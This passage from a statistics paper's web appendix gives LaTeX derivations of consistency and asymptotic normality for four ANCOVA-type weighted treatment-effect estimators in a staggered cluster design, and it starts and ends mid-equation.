\overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{J}^{0}w_ {J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0} \right)^{\prime}\end{array}\right)\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ ij}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ ijk}\right)\] \[\times\left(\begin{array}{c}\frac{1}{I}w_{1}^{1}\overline{y}_{1}(1) \\ \vdots\\ \frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\] Since, \[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\xrightarrow{p}\frac{1}{J} \sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},j},\] and \[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}Y_{ijk}\xrightarrow{p}\frac{1}{J}\sum_{j=1}^{ J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1),\] we have \[\left(\begin{array}{c}\widehat{\mathbf{\tau}}^{*}\\ \widehat{\mathbf{\eta}}^{*}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccc}\frac{1}{e_{1}\omega_{1} }&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\vdots\\ &&\frac{1}{e_{J}\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\left(\frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_ {\mathbf{X},j}\right)^{-1}\end{array}\right)\left(\begin{array}{c}e_{1}\mu_{1}^ {*}(1)\\ \vdots\\ e_{J}\mu_{J}^{*}(1)\\ \frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)\end{array}\right)= \left(\begin{array}{c}\frac{1}{\omega_{1}}\mu_{1}^{*}(1)\\ \vdots\\ \frac{1}{\omega_{J}}\mu_{J}^{*}(1)\\ \mathbf{\eta}^{**}\end{array}\right),\] where \[\mathbf{\eta}^{**}=\left(\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},j} \right)^{-1}\left(\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)\right).\] Thus, \[\widehat{\tau}_{j}^{*}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{ \omega_{j}}.\] Similarly, \[\left(\begin{array}{c}\widehat{\mathbf{\beta}}\\ \widehat{\mathbf{\gamma}}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccc}\frac{1}{(1-e_{1}) \omega_{1}}&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\vdots\\ &&\frac{1}{(1-e_{J})\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\left(\frac{1}{J}\sum_{j=1}^{J}(1-e_{j})\mathbf{ \Sigma}_{\mathbf{X},j}\right)^{-1}\end{array}\right)\left(\begin{array}{c}(1-e_ {1})\mu_{1}^{*}(0)\\ \vdots\\ (1-e_{J})\mu_{J}^{*}(0)\\ \frac{1}{J}\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right) =\left(\begin{array}{c}\frac{1}{\omega_{1}}\mu_{1}^{*}(0)\\ \vdots\\ \frac{1}{\omega_{J}}\mu_{J}^{*}(0)\\ \mathbf{\gamma}^{*}\end{array}\right),\] where \[\mathbf{\gamma}^{*}=\left(\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X}, j}\right)^{-1}\left(\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\right).\] Thus, \[\widehat{\beta}_{j}\xrightarrow{p}\frac{\mu_{j}^{*}(0)}{ \omega_{j}},\] and we have \[\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j} \xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{ \omega_{j}}.\] #### Web Appendix A2.1.4 ANCOVA IV For the fully-interacted model with period-varying covariate effects, we have \[\left(\begin{array}{c}\widehat{\tau}_{j}^{*}\\ \widehat{\mathbf{\eta}}_{j}^{*}\end{array}\right)\] \[=\left(\begin{array}{cc}w_{j}^{1}&\frac{w_{j}^{0}w_{j}^{1}}{w_{ j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\bm {X}}_{j}^{0}\right)^{\prime}&\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array} \right)^{-1}\left(\begin{array}{c}w_{1}^{1}\overline{y}_{j}(1)\\ \sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}\end{array}\right)\] \[=\left(\begin{array}{cc}\frac{1}{I}w_{j}^{1}&\frac{1}{w_{j}^{0 }w_{j}^{1}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)^{ \prime}&\frac{1}{I}\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\bm {X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)^{-1} \left(\begin{array}{c}\frac{1}{I}w_{j}^{1}\overline{y}_{j}(1)\\ \frac{1}{I}\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\bm {X}}_{ijk}^{\prime}\end{array}\right)\] \[\xrightarrow[]{p}\left(\begin{array}{cc}\frac{1}{\omega_{j}}& \mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&(e_{j}\mathbf{\Sigma}_{\mathbf{X},j})^{-1}\end{array}\right)\left(\begin{array} []{c}e_{j}\mu_{j}^{*}(1)\\ e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)\end{array}\right)=\left(\begin{array}{c} \frac{1}{\omega_{j}}\mu_{j}^{*}(1)\\ \mathbf{\eta}_{j}^{*\ast}\end{array}\right),\] where \[\mathbf{\eta}_{j}^{\ast\ast}=\mathbf{\Sigma}_{\mathbf{X},Y,j}^{-1}\mathbf{\Sigma}_{\mathbf{X},Y,j} (1).\] Thus, \[\widehat{\tau}_{j}^{*}\xrightarrow[]{p}\frac{\mu_{j}^{*}(1)}{ \omega_{j}}.\] Similarly, \[\left(\begin{array}{c}\widehat{\beta}_{j}\\ \widehat{\mathbf{\gamma}}_{j}\end{array}\right)\xrightarrow[]{p}\left(\begin{array} []{cc}\frac{1}{(1-e_{j})\omega_{j}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&((1-e_{j})\mathbf{\Sigma}_{\mathbf{X},j})^{-1}\end{array}\right)\left( \begin{array}{c}(1-e_{j})\mu_{j}^{*}(0)\\ (1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right)=\left(\begin{array}[] {c}\frac{1}{\omega_{j}}\mu_{j}^{*}(0)\\ \mathbf{\gamma}_{j}^{*}\end{array}\right),\] where \[\mathbf{\gamma}_{j}^{*}=\mathbf{\Sigma}_{\mathbf{X},j}^{-1}\mathbf{\Sigma}_{\mathbf{X},Y,j}(0).\] Thus, \[\widehat{\beta}_{j}\xrightarrow[]{p}\frac{\mu_{j}^{*}(0)}{ \omega_{j}},\] and we have \[\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j} \xrightarrow[]{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{ \omega_{j}}.\] ### Web Appendix A2.2 Proof of asymptotic normality We prove the asymptotic normality based on Theorem 2 of Schochet et al. (2021) and Theorem 4 of Li and Ding (2017). We first show the asymptotic normality assuming the covariate parameters are obtained on the full schedule of potential outcomes, and is constant for each treatment arm. Specifically, for ANCOVA I, \[\mathbf{\gamma}=\left(\sum_{j=1}^{J}\mathbf{S}_{\mathbf{X},j}\right)^{-1} \left(\sum_{j=1}^{J}e_{j}\mathbf{S}_{\mathbf{X},Y,j}(1)+\sum_{j=1}^{J}(1-e_{j})\mathbf{S}_ {\mathbf{X},Y,j}(0)\right);\] for ANCOVA II, \[\mathbf{\gamma}_{j}=\left(\mathbf{S}_{\mathbf{X},j}\right)^{-1}\left(e_{j}\mathbf{S}_{\mathbf{X}, Y,j}(1)+(1-e_{j})\mathbf{S}_{\mathbf{X},Y,j}(0)\right);\] for ANCOVA III, \[\mathbf{\eta}^{*}=\left(\sum_{j=1}^{J}e_{j}\mathbf{S}_{\mathbf{X},j}\right)^{ -1}\left(\sum_{j=1}^{J}e_{j}\mathbf{S}_{\mathbf{X},Y,j}(1)\right),\ \mathbf{\gamma}=\left(\sum_{j=1}^{J}(1-e_{j})\mathbf{S}_{\mathbf{X},j}\right)^{-1}\left( \sum_{j=1}^{J}(1-e_{j})\mathbf{S}_{\mathbf{X},Y,j}(0)\right);\] and for ANCOVA IV, \[\mathbf{\eta}_{j}^{*}=\mathbf{S}_{\mathbf{X},j}^{-1}\mathbf{S}_{\mathbf{X},Y,j}(1),\ \mathbf{\gamma}_{j}=\mathbf{S}_{\mathbf{X},j}^{-1}\mathbf{S}_{\mathbf{X},Y,j}(0).\] After establishing asymptotic normality with full schedule parameters, \(\mathbf{\gamma}\), \(\mathbf{\gamma}_{j}\), \(\mathbf{\eta}^{*}\), \(\mathbf{\eta}_{j}^{*}\), we show that those with estimated parameters, \(\widehat{\mathbf{\gamma}}\), \(\widehat{\mathbf{\gamma}}_{j}\), \(\widehat{\mathbf{\eta}}^{*}\), \(\widehat{\mathbf{\eta}}_{j}^{*}\), converge to the same distribution. #### Web Appendix A2.2.1 Asymptotic normality with known covariate parameters For the estimand, we have \(\overline{\mathbf{Y}}^{a}=\left(\overline{Y}_{1}^{a},\ldots,\overline{Y}_{J}^{a} \right)^{\prime}\), where \[\overline{Y}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}^{a}}{\sum_{i =1}^{I}w_{ij}}=\frac{I^{-1}\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}^{a}}{I^{-1} \sum_{i=1}^{I}w_{ij}}=\frac{\overline{w}\overline{Y}_{j}^{a}}{\overline{w}_{j }},\] and \[\overline{Y}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j \}w_{j}\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}w_{j}} =\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\overline{Y}_{j}^{a}}{\sum_{ a\in\mathcal{A}}\mathbb{I}\{a\leq j\}},\ \ \overline{Y}_{j}(0)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j} \overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j}}=\frac{ \sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\overline{Y}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}}.\] We can write the estimand as \[\tau=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}B_{j}^{a}\overline{Y}_{j}^{a},\] where \[B_{j}^{a}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{ I}\{a\leq j\}\varphi_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\} \varphi_{a}}-\frac{\mathbb{I}\{a>j\}\varphi_{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}\varphi_{a}}\right\}.\] If we choose \(\varphi_{a}=I_{a}\), then \[B_{j}^{a}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{ I}\{a\leq j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}}-\frac{ \mathbb{I}\{a>j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}}\right\}.\] Our estimator for the weighted average treatment effect is \[\widehat{\tau}=\frac{\sum_{j=1}^{J}w_{j}\widehat{\tau}_{j}}{\sum_{j=1}^{J}w_{ j}},\ \ \widehat{\tau}_{j}=\overline{u}_{j}(1)-\overline{u}_{j}(0).\] Specifically, \(\overline{\mathbf{u}}^{a}=(\overline{u}_{1}^{a},\ldots,\overline{u}_{J}^{a})^{\prime}\), where \[\overline{u}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\overline{ U}_{ij}^{a}}{\sum_{i=1}^{I}w_{ij}G_{ia}},\] and \[\overline{u}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j \}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{u}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)},\ \ \overline{u}_{j}(0)=\frac{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{u}_{j}^{a}}{ \sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}.\] We can then write the estimator as \[\widehat{\tau}=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}b_{j}^{a}\overline{u}_{j}^{ a},\] where \[b_{j}^{a}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{ I}\{a\leq j\}\left(I_{a}I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia}\right)}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}\left(I_{a}I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia} \right)}-\frac{\mathbb{I}\{a>j\}\left(I_{a}I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia} \right)}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\left(I_{a}I_{a}^{-1}\sum_{i=1 }^{I}w_{ij}G_{ia}\right)}\right\}\] \[=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{I}\{a\leq j\}I_{a} \overline{w}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}\overline {w}_{j}^{a}}-\frac{\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}}\right\}.\] Define intermediate quantities with known covariate parameters (recall Lemma 1): for ANCOVA I, \[\widetilde{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\mathbf{\gamma};\] for ANCOVA II, \[\widetilde{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\mathbf{\gamma }_{j};\] for ANCOVA III, \[\widetilde{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\left( \mathbb{I}\{a\leq j\}\mathbf{\eta}^{*}+\mathbb{I}\{a>j\}\mathbf{\gamma}\right);\] and for ANCOVA IV, \[\overline{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\left( \mathbb{I}\{a\leq j\}\mathbf{\eta}_{j}^{*}+\mathbb{I}\{a>j\}\mathbf{\gamma}_{j}\right).\] We also have the following quantities \[\widetilde{u}_{j}^{a}=\frac{\sum_{i=1}^{J}w_{ij}G_{ia}\widetilde{U}_{ij}^{a}} {\sum_{i=1}^{J}w_{ij}G_{ia}}=\frac{I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia} \widetilde{U}_{ij}^{a}}{I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia}}=\frac{w\widetilde {u}_{j}^{a}}{\overline{w}_{j}^{a}},\] and \[\widetilde{U}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}^{a}}{\sum_ {i=1}^{I}w_{ij}}=\frac{I^{-1}\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}^{a}}{I^{- 1}\sum_{i=1}^{I}w_{ij}}=\frac{w\widetilde{U}_{j}^{a}}{\overline{w}_{j}}.\] Let \(\overline{\mathbf{t}}^{a}=(w\widetilde{u}_{1}^{a},\ldots,w\widetilde{u}_{J}^{a}, \overline{w}_{1}^{a},\ldots,\overline{w}_{J}^{a})^{\prime}\), and \(\overline{\mathbf{T}}^{a}=(w\widetilde{U}_{1}^{a},\ldots,w\widetilde{U}_{J}^{a}, \overline{w}_{1},\ldots,\overline{w}_{J})^{\prime}\), with \(\overline{\mathbf{T}}_{i}^{a}=(w_{i1}\widetilde{U}_{i1}^{a},\ldots,w_{iJ} \widetilde{U}_{iJ}^{a},\)\(w_{i1},\ldots,w_{iJ}\)\(\widetilde{U}_{iJ}^{a} 2. Define \[m_{j}(w)=\max_{1\leq i\leq I}\left(w_{ij}-\overline{w}_{j}\right)^{2},\;\text{ and }\;\;v_{j}(w)=\frac{1}{I-1}\sum_{i=1}^{I}\left(w_{ij}-\overline{w}_{j}\right)^{2},\] and as \(I\to\infty\), \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{j}(w)}{I_{a}v_{j}(w)}\to 0.\] Then, by Theorem 4 of Li and Ding (2017), we have, as \(I\to\infty\), \[\left(\overline{\mathbf{t}}^{1}\left[\text{diag}\left\{\text{cov}\left(\overline{ \mathbf{t}}^{1}\right)\right\}\right]^{-1/2},\cdots,\overline{\mathbf{t}}^{J+1}\left[ \text{diag}\left\{\text{cov}\left(\overline{\mathbf{t}}^{J+1}\right)\right\} \right]^{-1/2}\right)\xrightarrow{d}\mathcal{N}\left(\mathbf{0}_{(J+1)\times 2J},\mathbf{R}_{T} \right),\] where \(\mathbf{R}_{T}\) is a correlation matrix. Define \(\widetilde{\tau}_{j}^{w}=h_{j}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t} }^{J+1})\), and \[\left(\begin{array}{c}\widetilde{\tau}_{1}^{w}\\ \vdots\\ \widetilde{\tau}_{J}^{w}\end{array}\right)=\left(\begin{array}{c}h_{1}( \overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})\\ \vdots\\ h_{J}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})\end{array}\right)= \mathbf{h}(\overline{\mathbf{t}}),\] where \[h_{j}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})=\frac{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}w\widetilde{w}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}\overline{w}_{j}^{a}}-\frac{\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}I_{a}w\widetilde{w}_{j}^{a}}{\sum_{a\in\mathcal{A} }\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}}.\] The gradient is \[\nabla h_{j}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})=\nabla h_ {j}(\overline{\mathbf{t}})=\left(\nabla_{\overline{\mathbf{t}}^{1}}h_{j}^{\prime}, \ldots,\nabla_{\overline{\mathbf{t}}^{J+1}}h_{j}^{\prime}\right)^{\prime},\] where \(\nabla_{\overline{\mathbf{t}}^{\ast}}h_{j}\) is a \(2J\)-dimensional vector with the \(j\)-th and the \((J+j)\)-th entries being nonzero, and zeros anywhere else. Specifically, the \(j\)-th entry is the partial derivative of \(h_{j}\) with respect to \(w\widetilde{w}_{j}^{a}\), which is \[\frac{\mathbb{I}\{a\leq j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\} I_{a}\overline{w}_{j}^{a}}-\frac{\mathbb{I}\{a>j\}I_{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}},\] and the \((J+j)\)-th entry is the partial derivative of \(h_{j}\) with respect to \(\overline{w}_{j}^{a}\), which is \[-\frac{\mathbb{I}\{a\leq j\}I_{a}\left(\sum_{a\in\mathcal{A}} \mathbb{I}\{a\leq j\}I_{a}w\widetilde{w}_{j}^{a}\right)}{\left(\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}\right)^{2}}+\frac{ \mathbb{I}\{a>j\}I_{a}\left(\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a} \overline{w}_{j}^{a}\right)}{\left(\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a }\overline{w}_{j}^{a}\right)^{2}}.\] When evaluated at \((\overline{\mathbf{T}}^{1},\ldots,\overline{\mathbf{T}}^{J+1})\), these two entries become \[\frac{\mathbb{I}\{a\leq j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\} I_{a}\overline{w}_{j}}-\frac{\mathbb{I}\{a>j\}I_{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}I_{a}\overline{w}_{j}},\text{ and }-\frac{\mathbb{I}\{a\leq j\}I_{a}w \widetilde{U}_{j}(1)}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a} \overline{w}_{j}^{2}}+\frac{\mathbb{I}\{a>j\}I_{a}w\widetilde{U}_{j}(0)}{\sum_{ a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{2}}.\] This is because for all \(a\leq j\)\((a>j)\), \(w\widetilde{U}_{j}^{a}=w\widetilde{U}_{j}(1)\)\((w\widetilde{U}_{j}^{a}=w\widetilde{U}_{j}(0))\). Define \[\mathbf{\nabla h}(\overline{\mathbf{t}})=\left(\begin{array}{c}\nabla h_{1}( \overline{\mathbf{t}})\\ \vdots\\ \nabla h_{J}(\overline{\mathbf{t}})\end{array}\right),\text{ and }\mathbf{\nabla h}(\overline{\mathbf{T}})=\left( \begin{array}{c}\nabla h_{1}(\overline{\mathbf{T}})\\ \vdots\\ \nabla h_{J}(\overline{\mathbf{T}})\end{array}\right).\] Assuming that \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(1)\neq 0\) or \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(0)\neq 0\), for some \(j\), these derivatives are all continuous for a specific \(a\) and \(j\). Therefore, using the finite population delta method by Pashley (2022), we have \[\left\{\mathbf{h}(\overline{\mathbf{t}})-\mathbf{h}(\overline{\mathbf{T}})\right\}\left\{\mathbf{ \nabla h}(\overline{\mathbf{T}})\mathbf{V}_{T}\mathbf{R}_{T}\mathbf{V}_{T}\mathbf{\nabla h}(\overline {\mathbf{T}})^{\prime}\right\}^{-1/2}\xrightarrow{d}\mathcal{N}(0,\mathbf{I}_{J}),\] where \[\mathbf{V}_{T}=\otimes_{a}\left[\operatorname{diag}\left\{\operatorname{ cov}\left(\overline{\mathbf{t}}^{a}\right)\right\}\right]^{-1/2}.\] Further define \[\mathbf{\Sigma}_{T}=\mathbf{V}_{T}\mathbf{R}_{T}\mathbf{V}_{T},\ \ \text{and}\ \ \mathbf{\Sigma}_{\tau^{w}}=\mathbf{ \nabla}\mathbf{h}(\overline{\mathbf{T}})\mathbf{V}_{T}\mathbf{R}_{T}\mathbf{V}_{T}\mathbf{\nabla}\mathbf{h }(\overline{\mathbf{T}})^{\prime},\] then since \[\mathbf{\nabla}\mathbf{h}(\overline{\mathbf{T}})=\left(\begin{array}{c}\nabla h_{1}( \overline{\mathbf{T}})\\ \vdots\\ \nabla h_{J}(\overline{\mathbf{T}})\end{array}\right)=\left(\begin{array}{ccc} \nabla h_{1}^{1}(\overline{\mathbf{T}})&\cdots&\nabla h_{1}^{J+1}(\overline{\mathbf{T }})\\ \vdots&&\vdots\\ \nabla h_{J}^{1}(\overline{\mathbf{T}})&\cdots&\nabla h_{J}^{J+1}(\overline{\mathbf{T }})\end{array}\right)=\left(\begin{array}{ccc}\mathbf{\nabla}\mathbf{h}^{1}( \overline{\mathbf{T}})&\cdots&\mathbf{\nabla}\mathbf{h}^{J+1}(\overline{\mathbf{T}})\end{array} \right),\] we have \[\mathbf{\Sigma}_{\tau^{w}}=\sum_{a,a^{\prime}\in\mathcal{A}}\mathbf{\nabla}\mathbf{h}^{a}( \overline{\mathbf{T}})\text{cov}\left(\overline{\mathbf{t}}^{a},\overline{\mathbf{t}}^{a^ {\prime}}\right)\mathbf{\nabla}\mathbf{h}^{a^{\prime}}(\overline{\mathbf{T}})^{\prime}.\] To facilitate further derivations, we define the following \[\mathbf{U}_{i}^{a}= \left(\overline{\mathbf{U}}_{i}(1)-\overline{\mathbf{U}}(1)\right)\left( \otimes_{j=1}^{J}\mathbb{I}\{a\leq j\}\right)+\left(\overline{\mathbf{U}}_{i}(0)- \overline{\mathbf{U}}(0)\right)\left(\otimes_{j=1}^{J}\mathbb{I}\{a>j\}\right)\] \[= \left(\begin{array}{c}\overline{U}_{i1}(1)-\overline{U}_{1}(1) \\ \vdots\\ \overline{U}_{iJ}(1)-\overline{U}_{J}(1)\end{array}\right)\left(\begin{array}[] {c}\mathbb{I}\{a\leq 1\}\\ \ddots\\ \mathbb{I}\{a\leq J\}\end{array}\right)+\left(\begin{array}{ccc}\overline{U }_{i1}(0)-\overline{U}_{1}(0)\\ \vdots\\ \overline{U}_{iJ}(0)-\overline{U}_{J}(0)\end{array}\right)\left(\begin{array}[] {c}\mathbb{I}\{a>1\}\\ \ddots\\ \mathbb{I}\{a>J\}\end{array}\right),\] and \[\widetilde{\mathbf{W}}_{i}^{a}= \otimes_{j=1}^{J}\left(\frac{\mathbb{I}\{a\leq j\}I_{a}w_{ij}}{ \sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}\overline{w}_{j}}-\frac{ \mathbb{I}\{a>j\}I_{a}w_{ij}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a} \overline{w}_{j}}\right)\] \[= \otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a\leq j\}I_{a}\overline{w}_{j}}\mathbb{I}\{a\leq j\}-\frac{I_{a}w_ {ij}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}}\mathbb{I} \{a>j\}\right)\] \[= \otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{I_{j}\overline{w}_{j}} \mathbb{I}\{a\leq j\}-\frac{I_{a}w_{ij}}{(I-I_{j})\overline{w}_{j}}\mathbb{I} \{a>j\}\right).\] Then, in a finite population, for \(a=a^{\prime}\), \[\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}})\text{cov}\left(\overline{\mathbf{t}}^{a }\right)\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}})^{\prime}=\left(\frac{1}{I_{a} }-\frac{1}{I}\right)\frac{1}{I-1}\sum_{i=1}^{I}\mathbf{U}_{i}^{a}\widetilde{\mathbf{W} }_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\mathbf{U}_{i}^{a^{\prime}},\] and for \(a\neq a^{\prime}\), \[\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}})\text{cov}\left(\overline{\mathbf{t}}^{a },\overline{\mathbf{t}}^{a^{\prime}}\right)\mathbf{\nabla}\mathbf{h}^{a^{\prime}}( \overline{\mathbf{T}})^{\prime}=-\frac{1}{I}\frac{1}{I-1}\sum_{i=1}^{I}\mathbf{U}_{i}^ {a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a^{\prime}}\mathbf{U}_{i}^{a ^{\prime}}.\] Therefore, we have the finite population covariance matrix for \((\widetilde{\tau}_{1}^{w},\ldots,\widetilde{\tau}_{J}^{w})^{\prime}\), \[\mathbf{\Sigma}_{\tau^{w}}= \sum_{a\in\mathcal{A}}\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}}) \text{cov}\left(\overline{\mathbf{t}}^{a}\right)\mathbf{\nabla}\mathbf{h}^{a}(\overline{ \mathbf{T}})^{\prime}+\sum_{a\neq a^{\prime}}\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T} })\text{cov}\left(\overline{\mathbf{t}}^{a},\overline{\mathbf{t}}^{a^{\prime}}\right) \mathbf{\nabla}\mathbf{h}^{a^{\prime}}(\overline{\mathbf{T}})^{\prime}\] \[= 